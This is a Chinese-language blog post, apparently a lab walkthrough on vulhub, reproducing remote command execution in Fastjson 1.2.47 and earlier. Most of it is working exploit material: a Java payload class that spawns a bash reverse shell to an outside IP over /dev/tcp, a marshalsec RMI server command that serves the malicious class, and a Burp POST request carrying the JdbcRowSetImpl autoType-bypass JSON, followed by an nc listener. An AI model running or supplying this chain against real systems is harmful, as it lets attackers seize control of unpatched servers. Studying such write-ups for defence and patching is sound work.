Fastjson Remote Command Executio
2022-10-30 本文已影响0人
migrate_
影响版本
Fastjson1.2.47以及之前的版本
复现步骤
使用vulhub
打开存在漏洞的页面
0.png
新建一个TouchFile.java,并编译成class文件
javac TouchFile.java
文件内容
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/cve-2017-18349"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
getshell(实际利用exp)
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.199.51/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
准备工具
1.开启http服务
把生成的文件(TouchFile.class)放在网站的根目录里边(wwwroot)
能访问这个文件,比如这样
http://118.190.11.22/TouchFile.class
如果没有可以使用python开启简易环境
使用python开启站点
python -m SimpleHTTPServer 1111
http://192.168.239.139:1111/TouchFile.class
然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类
marshalsec下载地址:https://github.com/RandomRobbieBF/marshalsec-jar
安装mvn
Maven官网
https://maven.apache.org/download.cgi
下载maven
wget https://archive.apache.org/dist/maven/maven-3/3.8.5/binaries/apache-maven-3.8.5-bin.tar.gz
新建mvn目录
mkdir /usr/local/mvn
解压到相应位置
tar -zxvf apache-maven-3.8.5-bin.tar.gz -C /usr/local/mvn
切换目录
/usr/local/mvn
更新文件名称
mv apache-maven-3.8.5 maven-3.8.5
配置环境变量
vi /etc/profile
设置Maven环境变量
MAVEN_HOME=/usr/local/mvn/maven-3.8.5
export PATH=$PATH:$MAVEN_HOME/bin
重新加载/etc/profile
source /etc/profile
查看maven版本
mvn -version
安装完成
运行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.139:1111/#TouchFile" 9999
1.png
burpsuit修改数据包发送请求
POST / HTTP/1.1
Host: 123.58.224.8:50365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 197
{"a":{ "@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://118.190.105.21:9999/TouchFile.class","autoCommit":true}}
2.png
nc 监听端口
nc -lvvp 4444
3.png
